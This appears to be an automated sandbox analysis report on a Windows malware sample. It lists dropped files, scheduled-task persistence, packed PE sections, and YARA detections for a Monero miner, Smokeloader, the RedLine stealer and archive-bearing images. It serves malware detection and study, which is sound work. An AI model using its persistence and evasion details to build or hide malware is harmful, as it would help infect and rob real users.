Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	File created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99772074518	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99772354314	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99772670895	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99772941561	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99773141174	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png entropy: 7.99450935401	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f entropy: 7.99450935401	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip entropy: 7.99352358954	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png entropy: 7.99450935401	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen

Drops password protected ZIP file

Source: file.bin.7.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name: .idata
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name:
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name:
Source: H9TU4oY.exe.4.dr	Static PE information: section name:
Source: H9TU4oY.exe.4.dr	Static PE information: section name: .idata
Source: H9TU4oY.exe.4.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: .idata
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name:
Source: ZiYbk6W.exe.4.dr	Static PE information: section name:
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: .idata
Source: ZiYbk6W.exe.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: f11f18202b.exe.4.dr	Static PE information: section name:
Source: f11f18202b.exe.4.dr	Static PE information: section name: .idata
Source: f11f18202b.exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: .idata
Source: random[2].exe.4.dr	Static PE information: section name:
Source: 3a4323f24d.exe.4.dr	Static PE information: section name:
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: .idata
Source: 3a4323f24d.exe.4.dr	Static PE information: section name:
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name:
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: .idata
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name:
Source: random[2].exe1.4.dr	Static PE information: section name:
Source: random[2].exe1.4.dr	Static PE information: section name: .idata
Source: 5102d46fb9.exe.4.dr	Static PE information: section name:
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 6%

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B596AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,

12_2_00B596AC

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A8860	0_2_006A8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A7049	0_2_006A7049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A78BB	0_2_006A78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00778101	0_2_00778101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A31A8	0_2_006A31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00777B6E	0_2_00777B6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00664B30	0_2_00664B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A2D10	0_2_006A2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00664DE0	0_2_00664DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00697F36	0_2_00697F36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A779B	0_2_006A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A078BB	2_2_00A078BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A08860	2_2_00A08860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A07049	2_2_00A07049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A031A8	2_2_00A031A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009C4B30	2_2_009C4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009C4DE0	2_2_009C4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A02D10	2_2_00A02D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00A0779B	2_2_00A0779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009F7F36	2_2_009F7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A078BB	3_2_00A078BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A08860	3_2_00A08860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A07049	3_2_00A07049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A031A8	3_2_00A031A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009C4B30	3_2_009C4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009C4DE0	3_2_009C4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A02D10	3_2_00A02D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00A0779B	3_2_00A0779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009F7F36	3_2_009F7F36
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_001C8011	5_2_001C8011
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F3068	5_2_000F3068
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000B4AF0	5_2_000B4AF0
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F2BD0	5_2_000F2BD0
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000B4CF0	5_2_000B4CF0
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000E7D83	5_2_000E7D83
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F765B	5_2_000F765B
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F6F09	5_2_000F6F09
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F8720	5_2_000F8720
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000F777B	5_2_000F777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00673068	6_2_00673068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00634AF0	6_2_00634AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00672BD0	6_2_00672BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00634CF0	6_2_00634CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00667D83	6_2_00667D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0067765B	6_2_0067765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0067777B	6_2_0067777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00678720	6_2_00678720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00676F09	6_2_00676F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00673068	8_2_00673068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00634AF0	8_2_00634AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00672BD0	8_2_00672BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00634CF0	8_2_00634CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00667D83	8_2_00667D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0067765B	8_2_0067765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0067777B	8_2_0067777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00678720	8_2_00678720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00676F09	8_2_00676F09
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B7F13E	12_2_00B7F13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B724C0	12_2_00B724C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B75458	12_2_00B75458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B747AC	12_2_00B747AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B98817	12_2_00B98817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B60DCC	12_2_00B60DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B5F1B4	12_2_00B5F1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B5B114	12_2_00B5B114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B6C278	12_2_00B6C278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B93528	12_2_00B93528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B82578	12_2_00B82578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B8066E	12_2_00B8066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B7D66C	12_2_00B7D66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B6D858	12_2_00B6D858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B899B8	12_2_00B899B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B949A5	12_2_00B949A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B879DC	12_2_00B879DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B7694C	12_2_00B7694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B9DA30	12_2_00B9DA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B8FA0C	12_2_00B8FA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B68CA8	12_2_00B68CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B9DC11	12_2_00B9DC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B67C68	12_2_00B67C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B9DD00	12_2_00B9DD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B76E08	12_2_00B76E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B58F18	12_2_00B58F18
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B6AF58	12_2_00B6AF58

Source: Joe Sandbox View	Dropped File: C:\Program Files\Windows Media Player\graph\graph.exe D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe ED252FE89BA1243BAD21F373C952B16940A0094149B0BE50E5C3DA9C20A23234

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 006780C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009DDF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009D80C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0064DEB0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 00647F30 appears 256 times
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: String function: 000C7F30 appears 128 times

Source: 94CwbGg[1].exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg[1].exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg[1].exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg[1].exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg[1].exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg.exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg.exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg.exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg.exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 94CwbGg.exe.4.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.

Source: Bxq1jd2[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Bxq1jd2.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EkmIhQM[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EkmIhQM.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: random[1].exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[1].exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: b1dc05533c.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: b1dc05533c.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[1].exe0.4.dr	Static PE information: Section: ZLIB complexity 0.9964396713215259
Source: 0d47c4c34f.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9964396713215259
Source: H9TU4oY[1].exe.4.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: H9TU4oY[1].exe.4.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: H9TU4oY.exe.4.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: H9TU4oY.exe.4.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: ZiYbk6W[1].exe.4.dr	Static PE information: Section: ZLIB complexity 0.9986866918103449
Source: ZiYbk6W[1].exe.4.dr	Static PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
Source: ZiYbk6W.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9986866918103449
Source: ZiYbk6W.exe.4.dr	Static PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
Source: random[1].exe1.4.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: random[1].exe1.4.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: f11f18202b.exe.4.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: f11f18202b.exe.4.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: random[2].exe.4.dr	Static PE information: Section: ZLIB complexity 1.000187285958904
Source: random[2].exe.4.dr	Static PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
Source: 3a4323f24d.exe.4.dr	Static PE information: Section: ZLIB complexity 1.000187285958904
Source: 3a4323f24d.exe.4.dr	Static PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
Source: a4bd6a9bcb.exe.4.dr	Static PE information: Section: asolipax ZLIB complexity 0.9945088370901639
Source: 82bc687fc3.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: 82bc687fc3.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: axplong.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9964396713215259

Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: wOKhy9f[1].exe.4.dr, cae530d24e7bf71b77f301796d10b0911.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: wOKhy9f.exe.4.dr, cae530d24e7bf71b77f301796d10b0911.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: EkmIhQM[1].exe.4.dr, RazorEditorParser.cs	Task registration methods: 'CreateAndStart'
Source: EkmIhQM[1].exe.4.dr, RazorParser.cs	Task registration methods: 'CreateParseTask'
Source: EkmIhQM.exe.4.dr, RazorEditorParser.cs	Task registration methods: 'CreateAndStart'
Source: EkmIhQM.exe.4.dr, RazorParser.cs	Task registration methods: 'CreateParseTask'

